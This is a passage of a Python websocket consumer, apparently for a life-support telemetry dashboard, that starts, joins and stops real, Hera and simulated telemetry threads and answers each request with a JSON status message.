self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'full',
'message': 'All fake telemetries are in use.',
'attempt': content.get('attempt')
}
}))
# Should not get to here
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'This user did not get assigned a fake telemetry even though not all were full.',
'attempt': content.get('attempt')
}
}))
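# NOTE: the four fake-telemetry slots handled above repeat the same start-up logic; only the
# thread/queue index, the Redis set name, and the hub message type change between them. A minimal
# refactoring sketch, assuming a hypothetical module-level helper (the name start_fake_slot and its
# signature are illustrative, not part of this codebase):
#
#     def start_fake_slot(idx):
#         """Ensure the AT and telemetry threads for fake-telemetry slot idx are running."""
#         at = global_obj.simulator_at_threads[idx]
#         if at is None or not at.is_alive():
#             at = threading.Thread(target=anomaly_treatment_routine,
#                                    name="Fake AT Thread %d" % (idx + 1),
#                                    args=(global_obj.hub_to_simulator_at_queues[idx],
#                                          global_obj.simulator_at_to_hub_queues[idx]))
#             at.start()
#             global_obj.simulator_at_threads[idx] = at
#         sim = global_obj.simulator_threads[idx]
#         if at.is_alive() and (sim is None or not sim.is_alive()):
#             sim = threading.Thread(target=simulate_by_dummy_eclss,
#                                    name="Fake Telemetry Thread %d" % (idx + 1),
#                                    args=(global_obj.simulator_to_hub_queues[idx],
#                                          global_obj.hub_to_simulator_queues[idx]))
#             sim.start()
#             global_obj.simulator_threads[idx] = sim
#         return at.is_alive(), sim is not None and sim.is_alive()
#
# Each per-slot branch above could then collapse into a call to the helper plus the response handling.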
elif content.get('type') == 'start_real_telemetry':
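# Flow summary: make sure the Real AT (anomaly treatment) thread exists and is alive, then make sure
# the Real Telemetry thread exists and is alive, register this channel with the hub via
# "add_to_sEclss_group", send a real_telemetry_response, and finally request the telemetry
# parameters. If the telemetry thread fails to start, the AT thread is told to stop and an error is
# returned instead.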
# Check if sEclss at thread is not initialized then initialize it and handle sEclss thread
if global_obj.sEclss_at_thread is None:
# Anomaly detection thread initialization for real telemetry
global_obj.sEclss_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Real AT Thread",
args=(global_obj.hub_to_sEclss_at_queue,
global_obj.sEclss_at_to_hub_queue,))
global_obj.sEclss_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.sEclss_at_thread.is_alive():
print("Real AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting real at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting real at thread. Real telemetry was not started.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread has been initialized then handle if it is alive or not
else:
# If alive then check telemetry as normal
if global_obj.sEclss_at_thread.is_alive():
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread was already'
' running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Real at thread was already running but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Real at thread and real telemetry were'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread was '
'already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Real AT Thread was already running but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry normally
else:
# Anomaly detection thread initialization for real telemetry
global_obj.sEclss_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Real AT Thread",
args=(global_obj.hub_to_sEclss_at_queue,
global_obj.sEclss_at_to_hub_queue,))
global_obj.sEclss_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.sEclss_at_thread.is_alive():
print("Real AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting real at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real '
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting real at thread. Real telemetry was not started.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'start_hera_telemetry':
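# Flow summary: same structure as the start_real_telemetry handler above, but using the hera_*
# threads and queues, the "add_to_hera_group" hub message, and hera_telemetry_response replies.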
# Check if hera at thread is not initialized then initialize it and handle hera thread
if global_obj.hera_at_thread is None:
# Anomaly detection thread initialization for hera telemetry
global_obj.hera_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Hera AT Thread",
args=(global_obj.hub_to_hera_at_queue,
global_obj.hera_at_to_hub_queue,))
global_obj.hera_at_thread.start()
# Check that the anomaly detection thread is working then check hera thread
if global_obj.hera_at_thread.is_alive():
print("Hera AT Thread started.")
# Check if hera thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If hera thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting hera at thread and hera telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If hera at thread does not start then don't start hera telemetry and send back error
else:
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting hera at thread. Hera telemetry was not started.',
'attempt': content.get('attempt')
}
}))
# If hera at thread has been initialized then handle if it is alive or not
else:
# If alive then check telemetry as normal
if global_obj.hera_at_thread.is_alive():
# Check if hera thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread was already'
' running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Hera at thread was already running but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If hera thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Hera at thread and hera telemetry were'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread was '
'already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Hera AT Thread was already running but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry normally
else:
# Anomaly detection thread initialization for hera telemetry
global_obj.hera_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Hera AT Thread",
args=(global_obj.hub_to_hera_at_queue,
global_obj.hera_at_to_hub_queue,))
global_obj.hera_at_thread.start()
# Check that the anomaly detection thread is working then check hera thread
if global_obj.hera_at_thread.is_alive():
print("Hera AT Thread started.")
# Check if hera thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If hera thread has been initialized then handle whether it is alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting hera at thread and hera telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera '
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If hera at thread does not start then don't start hera telemetry and send back error
else:
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting hera at thread. Hera telemetry was not started.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'stop_telemetry':
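# Flow summary: look up which telemetry feed this channel is subscribed to (the Redis sets), remove
# the channel from the matching group, and if it was the last listener ask the corresponding thread
# queues to stop. Each stop is verified with join(2.0); if the thread is still alive afterwards the
# user is re-added to the group and an error response is sent instead of a success.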
# Find what telemetry this user is assigned to if any
if r.sismember('seclss-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.sEclss_thread is None and global_obj.sEclss_at_thread is None:
r.srem('seclss-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("sEclss-group", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to real telemetry but real telemetry and real at threads'
' are not initialized.',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real at thread and real telemetry was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Real telemetry thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real telemetry thread was not initialized and real at thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only the at thread is not initialized
elif global_obj.sEclss_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping real telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real telemetry thread and real at thread was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Real at thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real at thread was not initialized and real telemetry thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.sEclss_thread.is_alive() and global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("seclss-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_real_telemetry'})
# Ensure that the thread stops
successful = True
sEclssMessage = ''
atsEclssMessage = ''
global_obj.sEclss_thread.join(2.0)
if global_obj.sEclss_thread.is_alive():
successful = False
sEclssMessage = 'There was an error stopping the real telemetry thread.'
global_obj.sEclss_at_thread.join(2.0)
if global_obj.sEclss_at_thread.is_alive():
successful = False
atsEclssMessage = 'There was an error stopping the real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping the real telemetry. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd('seclss-group-users', self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': sEclssMessage + ' ' + atsEclssMessage,
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only sEclss thread is alive
elif global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping real telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real telemetry thread and real at was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Real at thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive
elif global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
